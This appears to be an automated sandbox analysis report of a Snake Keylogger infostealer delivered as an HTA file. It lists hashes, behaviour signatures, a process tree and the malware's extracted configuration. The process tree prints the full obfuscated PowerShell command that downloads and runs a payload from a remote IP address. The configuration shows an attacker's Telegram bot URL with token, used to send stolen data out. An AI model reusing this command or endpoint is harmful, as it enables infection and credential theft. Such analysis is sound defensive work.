Analysis
- max time kernel: 143s
- max time network: 205s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16/10/2024, 01:40
Static task: static1
Behavioral task: behavioral1
- Sample: 16102024_0140_niceworkingprojectforeveryone.hta
- Resource: win7-20240729-en
Behavioral task: behavioral2
- Sample: 16102024_0140_niceworkingprojectforeveryone.hta
- Resource: win10v2004-20241007-en
General
- Target: 16102024_0140_niceworkingprojectforeveryone.hta
- Size: 165KB
- MD5: 44ad3c49b38f4f6f1739baf86d528fd3
- SHA1: afcf27df0ee2373846a1f6b8027e9cfcea77c486
- SHA256: 4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
- SHA512: e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
- SSDEEP: 96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted: snakekeylogger
- https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
- Snake Keylogger
  Keylogger and Infostealer first seen in November 2020.
- Snake Keylogger payload (1 IoC)
  resource | yara_rule
  behavioral2/memory/1148-92-0x0000000000400000-0x0000000000426000-memory.dmp | family_snakekeylogger
- Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  18 | 3172 | PoweRsHELl.ExE
- Downloads MZ/PE file
- Evasion via Device Credential Deployment (2 IoCs)
  pid | Process
  3172 | PoweRsHELl.ExE
  4168 | powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | mshta.exe
- Executes dropped EXE (1 IoC)
  pid | Process
  2364 | taskhostw.exe
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  20 | checkip.dyndns.org
- AutoIT Executable (1 IoC)
  AutoIT scripts compiled to PE executables.
  resource | yara_rule
  behavioral2/files/0x0008000000023c8a-76.dat | autoit_exe
- Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 2364 set thread context of 1148 | 2364 | taskhostw.exe | 99
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoC)
  pid | pid_target | Process | procid_target
  536 | 2364 | WerFault.exe | 98
- System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskhostw.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegSvcs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | PoweRsHELl.ExE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | Process
  3172 | PoweRsHELl.ExE
  3172 | PoweRsHELl.ExE
  4168 | powershell.exe
  4168 | powershell.exe
  1148 | RegSvcs.exe
  1148 | RegSvcs.exe
- Suspicious behavior: MapViewOfSection (1 IoC)
  pid | Process
  2364 | taskhostw.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 3172 | PoweRsHELl.ExE
  Token: SeDebugPrivilege | 4168 | powershell.exe
  Token: SeDebugPrivilege | 1148 | RegSvcs.exe
- Suspicious use of WriteProcessMemory (19 IoCs)
  description | pid | Process | procid_target
  PID 4228 wrote to memory of 3172 | 4228 | mshta.exe | 86
  PID 4228 wrote to memory of 3172 | 4228 | mshta.exe | 86
  PID 4228 wrote to memory of 3172 | 4228 | mshta.exe | 86
  PID 3172 wrote to memory of 4168 | 3172 | PoweRsHELl.ExE | 89
  PID 3172 wrote to memory of 4168 | 3172 | PoweRsHELl.ExE | 89
  PID 3172 wrote to memory of 4168 | 3172 | PoweRsHELl.ExE | 89
  PID 3172 wrote to memory of 4044 | 3172 | PoweRsHELl.ExE | 94
  PID 3172 wrote to memory of 4044 | 3172 | PoweRsHELl.ExE | 94
  PID 3172 wrote to memory of 4044 | 3172 | PoweRsHELl.ExE | 94
  PID 4044 wrote to memory of 3636 | 4044 | csc.exe | 95
  PID 4044 wrote to memory of 3636 | 4044 | csc.exe | 95
  PID 4044 wrote to memory of 3636 | 4044 | csc.exe | 95
  PID 3172 wrote to memory of 2364 | 3172 | PoweRsHELl.ExE | 98
  PID 3172 wrote to memory of 2364 | 3172 | PoweRsHELl.ExE | 98
  PID 3172 wrote to memory of 2364 | 3172 | PoweRsHELl.ExE | 98
  PID 2364 wrote to memory of 1148 | 2364 | taskhostw.exe | 99
  PID 2364 wrote to memory of 1148 | 2364 | taskhostw.exe | 99
  PID 2364 wrote to memory of 1148 | 2364 | taskhostw.exe | 99
  PID 2364 wrote to memory of 1148 | 2364 | taskhostw.exe | 99
- outlook_office_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
- outlook_win_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Processes (nested by parent/child, depth 1 = top-level)
- C:\Windows\SysWOW64\mshta.exe (PID 4228)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  Signatures: Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE (PID 3172)
    Command line: "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
    Signatures: Blocklisted process makes network request; Evasion via Device Credential Deployment; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4168)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
      Signatures: Evasion via Device Credential Deployment; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 4044)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.cmdline"
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 3636)
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9069.tmp" "c:\Users\Admin\AppData\Local\Temp\dq3dlhag\CSCB35195D17B1A407FB26BE3F434266FBE.TMP"
        Signatures: System Location Discovery: System Language Discovery
    - C:\Users\Admin\AppData\Roaming\taskhostw.exe (PID 2364)
      Command line: "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 1148)
        Command line: "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        Signatures: Accesses Microsoft Outlook profiles; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path
      - C:\Windows\SysWOW64\WerFault.exe (PID 536)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 744
        Signatures: Program crash
- C:\Windows\SysWOW64\WerFault.exe (PID 3232)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2364 -ip 2364
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: 3d086a433708053f9bf9523e1d87a4e8
  SHA1: b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
  SHA256: 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
  SHA512: 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
- Filesize: 18KB
  MD5: 93aff0527ee852bd4f2758ff570a5bdd
  SHA1: b2c2ec10c6e4227c42772d08246bfcc3054a707f
  SHA256: 63b2bd55be9abfbacc3e3de76d85d65fbbcb603662511d8cc27ad67fadc8c843
  SHA512: b4be0c3b80c46f6c9c63748ac4e6c76e4853c4093cd201f6844560e05784386728c12fbde7a9f800ef147d7e715ac770b2cf98fb952ccfd3ee9a03bfba8568e9
- Filesize: 1KB
  MD5: 6477e6f0f98432e7062a98ae035d719d
  SHA1: 6f7f283a5edd8f65defd87d05df5a0bb4fdc1648
  SHA256: ab3de7f0a290228a77605b599c4843c227a30c08e4b84ac3e604ee46cfa38d57
  SHA512: 9a69ba9a3fb093cccc63b47f68353efb11e9c65811efa3d2b704e68c7ccab99a13550cc8cb95072cf7b5df03cebdb629ac9de1404d84cd509cc01c5ab0f86def
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 3KB
  MD5: c5e971606b36ef8ac72ae3bcb38999a0
  SHA1: 99d16e47077b23a073c43e8af25cc34bb759d358
  SHA256: de910001bd7f26e9db5d21d3f374330bec8e05683d313faca2cbe00826481d14
  SHA512: 882720d24a5f4e1fe519801b23035ca4bc3ef96ec46fd71f33a1eed870136d4a2f5be010636538831cb6fcfec9664f97c243ac4baa0c454e8d6de3b0b4ecd0ce
- Filesize: 948KB
  MD5: 3e2f27edd3deacd8f08f6ed1133b2040
  SHA1: 060e3218949c5a006bb8607e8228e6539b737bfb
  SHA256: 163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
  SHA512: da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
- Filesize: 652B
  MD5: 3fe6ab35aa55017b445a67534b2aba81
  SHA1: 2b7a1729f880cf517f3e8a3d753c42f1496daaa7
  SHA256: c80c593e93bf178016d47d1307b1584889fe9328429ae69453fdea9076272db9
  SHA512: 9178bd18bb93be708c5608dcc0ad0950d3ed143c9b41db091789464c6c2f132c0c9965bfa3826f49fbee332ae60e40048ff5a0ce0190c437f4f03d0a4e008900
- Filesize: 475B
  MD5: ecc2c10cb4c5954e2d5156bce54e41f4
  SHA1: 2d7cde31f9942c1dc80c493c03d675962991bf31
  SHA256: 21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
  SHA512: bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
- Filesize: 369B
  MD5: ce2ca4fde56c4f762eb195764e196332
  SHA1: 8beb6a3d549463ede47c2733af27229db814fdbd
  SHA256: 06fcbc079c63dde058bfe8c2cc733ac1f86aa4b0cfdc9864868016c4edeb57c7
  SHA512: 84f68ec0bf8ed38257a40e2f4bafec8dff9ab332568f36cf4b97fed7c5a771260de879dfeafc723f3aeb91e0e08d3d549da4bc963b2e911665d1c6a112ea820e